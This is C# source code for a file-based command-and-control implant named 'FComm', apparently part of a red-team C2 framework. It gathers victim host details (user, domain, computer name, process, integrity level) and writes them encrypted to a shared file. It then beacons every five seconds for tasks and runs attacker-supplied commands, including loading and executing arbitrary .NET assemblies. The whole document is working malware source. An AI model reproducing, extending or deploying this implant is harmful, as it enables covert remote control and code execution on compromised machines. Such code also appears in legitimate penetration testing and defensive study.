private void SendData(FCDataGram DataToSend)
{
//Turn object into a string.
//encrypt it
//write it.
SafeFileWrite(Encrypt(Key, DataToSend.ToString()));
}
public void Tasking(string input)
{
FCDataGram Task = new FCDataGram()
{
PacketType = "TASK", Input = input, Output = "", Actioned = false
};
}
public FCClient(string FilePath_In, string HostInfo, string key)
{
//initialise object.
try
{
FilePath = FilePath_In;
Key = key;
string path = Path.GetDirectoryName(FilePath_In);
string filename = Path.GetFileName(FilePath_In);
Directory.CreateDirectory(path); //Create the full path if it doesn't exist.
var f = File.Create(FilePath_In); //create the file if it doesn't exist. Probably worth putting more sanity checks here.
f.Close();
f.Dispose();
//lets populate it with the info we need.
FCDataGram InitialContent = new FCDataGram()
{
PacketType = "INIT", Input = Convert.ToBase64String(Encoding.UTF8.GetBytes("initial")), Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(HostInfo)), Actioned = true
};
SendData(InitialContent);
}
catch (SecurityException e)
{
Console.WriteLine(e.Message);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
private static void FCommConnect()
{
//initialise the implant.
if (initialised == false)
{
string u = "";
try
{
u = WindowsIdentity.GetCurrent().Name;
}
catch
{
u = Environment.UserName;
}
if (ihInteg())
{
u += "*";
}
string dn = Environment.UserDomainName;
string cn = Environment.GetEnvironmentVariable("COMPUTERNAME");
string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
var procname = Process.GetCurrentProcess().ProcessName;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string hostinfo = String.Format("FComm-Connected: {0};{1};{2};{3};{4};{5};", dn, u, cn, arch, pid, procname);
FComm = new FCClient(filename, hostinfo, encryption);
initialised = true;
}
try
{
running = true;
while (running)
{
if (initialised == true)
{
var output = new StringBuilder();
//DANGER: Removing this could end up absolutely spanking the CPU, this is effectively Beacon Time for the implant.
Thread.Sleep(5000); //fixed beacon time.
FCDataGram Task = FComm.GetCurrentTasking();
if (Task == null)
{
//Nothing to do.
continue;
}
if (Task.Actioned == true)
{
//The task in the file has been actioned already.
continue;
}
//Base64 decode required here.
var cmd = Encoding.UTF8.GetString(Convert.FromBase64String(Task.Input));
var sOutput2 = new StringWriter(); //Setup stringwriter to buffer output from command.
if (cmd.ToLower().StartsWith("kill-implant"))
{
running = false;
initialised = false;
sOutput2.WriteLine("[!] Killed Implant.");
FComm.CleanUp();
FComm = null;
}
else if (cmd.ToLower().StartsWith("loadmodule"))
{
try
{
var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = Assembly.Load(Convert.FromBase64String(module));
}
catch (Exception e) { sOutput2.WriteLine($"Error loading modules {e}"); }
sOutput2.WriteLine("Module loaded successfully");
}
else if (cmd.ToLower().StartsWith("run-dll-background") || cmd.ToLower().StartsWith("run-exe-background"))
{
sOutput2.WriteLine("[!] This is not implemented yet in FComm implant types.");
//This might not work!? Need to consider how to approach this.
/*
* Thread t = new Thread(() => RunAssembly(cmd, true));
* t.Start();
* sOutput2.WriteLine("[+] Running task in background, run get-bg to get background output.");
* sOutput2.WriteLine("[*] Only run one task in the background at a time per implant.");
*/
}
else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe"))
{
var oldOutput = Console.Out; //redirecting output
Console.SetOut(sOutput2);
sOutput2.WriteLine(RunAssembly((cmd)));
Console.SetOut(oldOutput); //redirecting it back.
}
else if (cmd.ToLower() == "foo")
{
sOutput2.WriteLine("bar");
}
else if (cmd.ToLower() == "get-bg")
{
//Removing this as Rob says this should just work, but it's not been properly tested yet.
sOutput2.WriteLine("[!] This is not implemented yet in FComm implant types.");
/*
* var backgroundTaskOutputString = backgroundTaskOutput.ToString();
* if (!string.IsNullOrEmpty(backgroundTaskOutputString))
* {
* output.Append(backgroundTaskOutputString); //check later.
* }
* else
* {
* sOutput2.WriteLine("[-] No output");
* }*/
}
else
{
var oldOutput = Console.Out;
Console.SetOut(sOutput2);
sOutput2.WriteLine(RunAssembly($"run-exe Core.Program Core {cmd}"));
Console.SetOut(oldOutput);
}
output.Append(sOutput2.ToString());
Task.Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(output.ToString()));
Task.Actioned = true;
FComm.UpdateTask(Task);
output.Clear();
output.Length = 0;
sOutput2.Flush();
sOutput2.Close();
}
}
}
catch (Exception e)
{
Console.WriteLine("Error: " + e.Message);
Console.WriteLine(e.StackTrace);
}
}
public void UpdateTask(FCDataGram Task)
{
//Just to make the methods seem sensible.
SendData(Task);
}
